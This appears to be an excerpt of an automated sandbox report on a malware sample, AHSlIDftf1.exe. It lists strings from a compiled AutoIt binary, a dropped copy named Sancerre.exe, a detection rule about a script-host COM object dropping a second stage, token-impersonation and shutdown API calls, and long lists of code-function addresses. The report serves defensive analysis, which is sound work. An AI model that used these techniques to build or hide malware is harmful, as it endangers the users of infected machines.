                  Source: AHSlIDftf1.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8376d2b7-4
                  Source: Sancerre.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e041734e-0
                  Source: Sancerre.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fb4489fa-3
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00DBD5EB
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00DB1201
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00DBE8F6
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005DE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_005DE8F6
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D5BF400_2_00D5BF40
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC20460_2_00DC2046
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D580600_2_00D58060
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB82980_2_00DB8298
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D8E4FF0_2_00D8E4FF
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D8676B0_2_00D8676B
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DE48730_2_00DE4873
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D5CAF00_2_00D5CAF0
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D7CAA00_2_00D7CAA0
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D6CC390_2_00D6CC39
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D86DD90_2_00D86DD9
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D591C00_2_00D591C0
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D6B1190_2_00D6B119
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D713940_2_00D71394
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D717060_2_00D71706
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D7781B0_2_00D7781B
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D719B00_2_00D719B0
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D6997D0_2_00D6997D
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D579200_2_00D57920
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D77A4A0_2_00D77A4A
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D77CA70_2_00D77CA7
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D71C770_2_00D71C77
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D89EEE0_2_00D89EEE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DDBE440_2_00DDBE44
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D71F320_2_00D71F32
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_015D93700_2_015D9370
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0057BF401_2_0057BF40
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E20461_2_005E2046
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005780601_2_00578060
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005D82981_2_005D8298
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005AE4FF1_2_005AE4FF
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005A676B1_2_005A676B
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_006048731_2_00604873
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0057CAF01_2_0057CAF0
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0059CAA01_2_0059CAA0
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0058CC391_2_0058CC39
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005A6DD91_2_005A6DD9
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0058B1191_2_0058B119
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005791C01_2_005791C0
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005913941_2_00591394
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005917061_2_00591706
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0059781B1_2_0059781B
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0058997D1_2_0058997D
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005779201_2_00577920
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005919B01_2_005919B0
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00597A4A1_2_00597A4A
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00591C771_2_00591C77
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00597CA71_2_00597CA7
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005FBE441_2_005FBE44
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005A9EEE1_2_005A9EEE
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00591F321_2_00591F32
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0107B2E81_2_0107B2E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CEA0882_2_00CEA088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CEC1472_2_00CEC147
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CED2782_2_00CED278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CE53622_2_00CE5362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CEC4682_2_00CEC468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CEC7382_2_00CEC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CEE9882_2_00CEE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CE69A02_2_00CE69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CECA082_2_00CECA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CECCD82_2_00CECCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CE6FC82_2_00CE6FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CECFAA2_2_00CECFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CE29E02_2_00CE29E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CEF9612_2_00CEF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CEE97A2_2_00CEE97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CE3E092_2_00CE3E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05139C182_2_05139C18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513FC682_2_0513FC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051317A02_2_051317A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05131E802_2_05131E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051329682_2_05132968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051350282_2_05135028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05130B302_2_05130B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051393282_2_05139328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513D5502_2_0513D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513D5402_2_0513D540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051395482_2_05139548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513DDF12_2_0513DDF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513CCA02_2_0513CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513EF512_2_0513EF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513EF602_2_0513EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513178F2_2_0513178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513DE002_2_0513DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05131E702_2_05131E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513E6B02_2_0513E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513E6AF2_2_0513E6AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513D9992_2_0513D999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513D9A82_2_0513D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513F8102_2_0513F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051350182_2_05135018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513F8052_2_0513F805
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513003F2_2_0513003F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051300402_2_05130040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513D0F82_2_0513D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513D0E92_2_0513D0E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513EB082_2_0513EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05130B202_2_05130B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05138B912_2_05138B91
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513F3B82_2_0513F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05138BA02_2_05138BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513F3A82_2_0513F3A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513E2582_2_0513E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513E24D2_2_0513E24D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0513EAF82_2_0513EAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051581D02_2_051581D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05157B782_2_05157B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05158FB02_2_05158FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515A9382_2_0515A938
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515E5382_2_0515E538
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515A9282_2_0515A928
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515C5582_2_0515C558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05150D482_2_05150D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515E5482_2_0515E548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515C5482_2_0515C548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051511902_2_05151190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515119F2_2_0515119F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051511A02_2_051511A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515E9D82_2_0515E9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515C9D82_2_0515C9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515E9C82_2_0515E9C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051515F82_2_051515F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515C9E82_2_0515C9E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051515E82_2_051515E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515DC192_2_0515DC19
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515FC182_2_0515FC18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051500062_2_05150006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051530082_2_05153008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051560302_2_05156030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515BC382_2_0515BC38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051560272_2_05156027
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515DC282_2_0515DC28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515BC2A2_2_0515BC2A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515345F2_2_0515345F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051500402_2_05150040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051564782_2_05156478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051534602_2_05153460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051504982_2_05150498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051504892_2_05150489
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051564882_2_05156488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515C0B72_2_0515C0B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051538B82_2_051538B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515E0B82_2_0515E0B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515E0A72_2_0515E0A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515C0C82_2_0515C0C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051508F02_2_051508F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051508E02_2_051508E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515B3182_2_0515B318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515B3072_2_0515B307
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051523002_2_05152300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515D3082_2_0515D308
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051577202_2_05157720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051577222_2_05157722
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051553282_2_05155328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051527582_2_05152758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051527492_2_05152749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05157B772_2_05157B77
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051557702_2_05155770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515F7782_2_0515F778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515D7982_2_0515D798
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515B7982_2_0515B798
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515D7872_2_0515D787
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051557802_2_05155780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515F7882_2_0515F788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05152BB02_2_05152BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05158FA02_2_05158FA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05152BAF2_2_05152BAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515B7A82_2_0515B7A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05155BD82_2_05155BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05152FF92_2_05152FF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051546102_2_05154610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05156A182_2_05156A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051546202_2_05154620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515EE572_2_0515EE57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05151A502_2_05151A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05151A412_2_05151A41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05156E702_2_05156E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05156E722_2_05156E72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05154A782_2_05154A78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515CE782_2_0515CE78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515CE672_2_0515CE67
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515EE682_2_0515EE68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05151E982_2_05151E98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051572B82_2_051572B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05151EA82_2_05151EA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05154ED02_2_05154ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05154EC02_2_05154EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051572C82_2_051572C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515D2F72_2_0515D2F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_051522F02_2_051522F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515F2F82_2_0515F2F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0515F2E72_2_0515F2E7
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 5_2_017446605_2_01744660
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123C1468_2_0123C146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012353628_2_01235362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123D2788_2_0123D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123C4758_2_0123C475
